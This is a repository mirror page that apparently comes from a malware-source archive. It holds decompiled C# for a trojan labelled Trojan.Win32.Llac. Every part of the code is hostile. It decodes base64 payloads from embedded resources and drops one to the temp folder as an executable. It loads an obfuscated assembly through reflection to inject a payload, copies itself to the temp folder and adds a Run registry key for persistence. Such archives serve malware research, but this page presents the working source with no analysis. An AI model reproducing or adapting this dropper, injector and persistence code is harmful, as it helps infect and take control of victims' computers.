mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
f2ac1ece55
add
99 lines
3.8 KiB
C#
99 lines
3.8 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: FEnlSOyWMywfjYq
|
|
// Assembly: test, Version=1.3.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 288A639D-2BFE-47D6-AC0D-B4513E74493A
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.tty-c809705e7446ebdc142e8b9bb34aa8f4f3091881969b799fd3683f150a10e3e7.exe
|
|
|
|
using Microsoft.VisualBasic;
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using Microsoft.Win32;
|
|
using My;
|
|
using System;
|
|
using System.Collections;
|
|
using System.Globalization;
|
|
using System.IO;
|
|
using System.Reflection;
|
|
using System.Resources;
|
|
using System.Runtime.CompilerServices;
|
|
using System.Runtime.InteropServices;
|
|
using System.Text;
|
|
using System.Windows.Forms;
|
|
|
|
[StandardModule]
|
|
public sealed class FEnlSOyWMywfjYq
|
|
{
|
|
public static object pnjwPSuPFwBUXzz(byte[] wfjYqescjZpEVhp)
|
|
{
|
|
string tempPath = Path.GetTempPath();
|
|
if (!MyProject.Computer.FileSystem.FileExists(tempPath + "runner52.exe"))
|
|
{
|
|
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("runner44", (object) ("\"" + tempPath + "runner52.exe\""));
|
|
File.Copy(Application.ExecutablePath, tempPath + "runner52.exe");
|
|
}
|
|
return (object) null;
|
|
}
|
|
|
|
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
|
|
public static extern int GetShortPathName(
|
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszLongPath,
|
|
StringBuilder lpszShortPath,
|
|
int cchBuffer);
|
|
|
|
public static object IJKHXknUpvcDJZA(string ohOJUsuiyaVepWw, byte[] bilnxUBdzxYeBWR)
|
|
{
|
|
object obj;
|
|
try
|
|
{
|
|
ResourceManager resourceManager = new ResourceManager("resurzi", Assembly.GetExecutingAssembly());
|
|
object resourceSet = (object) resourceManager.GetResourceSet(CultureInfo.CurrentCulture, true, true);
|
|
System.Type type = Assembly.Load(Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("zfc47")))).GetType(Strings.StrReverse("njeb.njeb"));
|
|
object objectValue = RuntimeHelpers.GetObjectValue(Activator.CreateInstance(type));
|
|
type.GetMethod(Strings.StrReverse("njeb")).Invoke(RuntimeHelpers.GetObjectValue(objectValue), new object[1]
|
|
{
|
|
(object) new ArrayList()
|
|
{
|
|
(object) bilnxUBdzxYeBWR,
|
|
(object) ohOJUsuiyaVepWw
|
|
}
|
|
});
|
|
obj = (object) null;
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
obj = (object) null;
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
return obj;
|
|
}
|
|
|
|
[STAThread]
|
|
public static void Main()
|
|
{
|
|
StringBuilder lpszShortPath = new StringBuilder(256);
|
|
string tempPath = Path.GetTempPath();
|
|
FEnlSOyWMywfjYq.GetShortPathName(ref tempPath, lpszShortPath, lpszShortPath.Capacity);
|
|
FEnlSOyWMywfjYq.omdjJjEcGSiTeXJ();
|
|
FEnlSOyWMywfjYq.IJKHXknUpvcDJZA(lpszShortPath.ToString() + "dll78.exe", FEnlSOyWMywfjYq.XrhLsKgIuILDtFa());
|
|
FEnlSOyWMywfjYq.pnjwPSuPFwBUXzz((byte[]) null);
|
|
}
|
|
|
|
public static void omdjJjEcGSiTeXJ()
|
|
{
|
|
string tempPath = Path.GetTempPath();
|
|
if (MyProject.Computer.FileSystem.FileExists(tempPath + "dll78.exe"))
|
|
return;
|
|
ResourceManager resourceManager = new ResourceManager("resurzi", Assembly.GetExecutingAssembly());
|
|
object resourceSet = (object) resourceManager.GetResourceSet(CultureInfo.CurrentCulture, true, true);
|
|
byte[] data = Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("smrk1")));
|
|
MyProject.Computer.FileSystem.WriteAllBytes(tempPath + "dll78.exe", data, false);
|
|
}
|
|
|
|
public static byte[] XrhLsKgIuILDtFa()
|
|
{
|
|
ResourceManager resourceManager = new ResourceManager("resurzi", Assembly.GetExecutingAssembly());
|
|
object resourceSet = (object) resourceManager.GetResourceSet(CultureInfo.CurrentCulture, true, true);
|
|
return Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("wow12")));
|
|
}
|
|
}
|